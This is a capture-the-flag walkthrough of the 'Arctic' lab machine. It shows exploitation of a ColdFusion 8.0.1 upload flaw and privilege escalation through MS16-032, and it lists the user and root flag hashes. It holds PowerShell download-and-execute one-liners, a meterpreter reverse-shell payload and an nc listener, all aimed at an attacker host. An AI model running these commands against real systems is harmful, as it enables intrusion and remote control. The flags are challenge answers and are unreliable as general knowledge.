Arctic

Arctic 10.10.10.11

Target Enumeration:

OS: Windows 2008

IP: 10.10.10.11

User: 02650d3a69a70780c302e146a6cb96f3

Root: ce65ceee66b2b5ebaff07e50508ffb90

Ports / Services / Software Versions Running

135/tcp open msrpc Microsoft Windows RPC 8500/tcp open http JRun Web Server 49154/tcp open msrpc Microsoft Windows RPC

Vulnerability Exploited:

ColdFusion 8.0.1 Arbitrary File Upload and Execute

This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload and Execute vulnerability.

https://www.rapid7.com/db/modules/exploit/windows/http/coldfusion_fckeditor

Privilege Escalation:

MS16-032 Secondary Logon Handle Privilege Escalation

This module exploits the lack of sanitization of standard handles in Windows' Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.

Replicating the exploit:

Nmap TCP

Webapp on port 8500

Dir search

Administrator gives a version 8

Searchsploit

Found the metasploit version of the exploit

Set options as follows

Start burp listener on port 127.0.0.1:8500 Check it works in the browser

Capture the request in burp

Check the filename it is writing to.

Navigate to that file via the browser and set up your nc listener on port 4444

Like so

Gather system info etc

Grab user file Execute Sherlock.ps1 after copying it to your pwd and starting your webserver.

echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.2/Invoke-MS16032.ps1") | powershell -noprofile -

Did not work so try getting a meterpreter shell instead.

git clone https://github.com/trustedsec/unicorn.git

python unicorn.py windows/meterpreter/reverse_tcp 10.10.14.2 4445

msfconsole -r unicorn.rc

cat powershell_attack.txt > exploit.html

Nano exploit.html Delete powershell etc to “sv including the single quote and the quote at the end.

Copy to your webserver

Run the following on Artic

powershell "iex(new-object net.webclient).downloadstring('http://10.10.14.2/exploit.html')"

Check meterpreter

Run local exploit suggester (32 bit)

This ran as 32 bit so switch to meterpreter and change to a 64 bit process

Only one as 64 bit

Set your options as follows:

Run the exploit to get a system shell.

Root.txt